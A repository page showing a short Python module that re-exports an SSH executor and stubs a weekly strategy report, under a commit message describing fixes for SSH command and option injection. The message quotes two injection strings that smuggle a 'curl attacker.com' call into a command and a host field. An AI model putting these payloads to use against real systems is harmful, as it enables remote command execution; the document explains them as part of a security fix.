Files
awoooi/services/openclaw_strategist_service.py
ogt 20e83306fe security: fix SSH command injection in SSHJumpExecutor + implement AutoHealService
Issues fixed:

1. [HIGH] OS Command Injection in execute_command() (CWE-78)
   command was accepted as a string and passed as the final SSH positional
   arg. Remote SSH executes it via sh -c, so shell metacharacters in
   command (semicolons, pipes, backticks) are interpreted.
   e.g. command="id; curl attacker.com" → two commands execute on target.
   Fix: command parameter changed to List[str]; TypeError raised if str
   is passed; SSH cmd built with ['--, *command] so remote shell sees
   argv, not a shell string. '--' stops SSH from interpreting options.

2. [HIGH] SSH Option Injection via host/user parameters (CWE-88)
   jump_host, target_host, jump_user, target_user were unsanitized.
   Attacker-controlled host like "-oProxyCommand=curl attacker.com #"
   could inject SSH options.
   Fix: _validate_host() / _validate_user() with strict regex on init
   and in execute_command(); ValueError raised on invalid input.

3. [BUG] AutoHealService.handle_exception() did not exist
   elephant_alpha_autonomous_engine.py imports and calls
   AutoHealService().handle_exception() — this would raise AttributeError
   at runtime. AutoHealService is now fully implemented:
   - Playbook lookup from DB (autoheal_models.Playbook)
   - ALLOWED_ACTION_TYPES allowlist (DOCKER_RESTART/WAIT_RETRY/ALERT_ONLY/SSH_CMD)
   - DOCKER_RESTART: static ['docker','restart',<validated_container>]
   - SSH_CMD: requires action_params.argv as list; host/user validated

4. [DESIGN] Duplicate SSHJumpExecutor across two files
   auto_heal_service.py and openclaw_strategist_service.py were byte-for-
   byte copies. Single source of truth now in auto_heal_service.py;
   openclaw_strategist_service.py re-exports SSHJumpExecutor.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-04-20 05:53:08 +08:00

32 lines
1.0 KiB
Python
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
"""
openclaw_strategist_service.py
OpenClaw 戰略分析師服務。
re-export SSHJumpExecutor from auto_heal_service唯一來源
以及 OpenClaw 策略分析功能。
"""
import logging
from typing import Optional, Any
logger = logging.getLogger(__name__)
# SSHJumpExecutor 統一維護於 auto_heal_service此處 re-export 向後相容
from services.auto_heal_service import SSHJumpExecutor # noqa: F401
__all__ = ["SSHJumpExecutor", "generate_weekly_strategy_report"]
def generate_weekly_strategy_report(context: Optional[Any] = None) -> dict:
"""
OpenClaw 週報生成(戰略分析)。
當 ElephantAlpha orchestrator 分派 openclaw generate_market_analysis 時呼叫。
"""
logger.info("[OpenClaw] generate_weekly_strategy_report called")
# TODO: 接入 OpenClaw LLM 生成真實週報
return {
"status": "ok",
"report_type": "weekly_strategy",
"summary": "OpenClaw strategy report placeholder — LLM integration pending",
"context": context,
}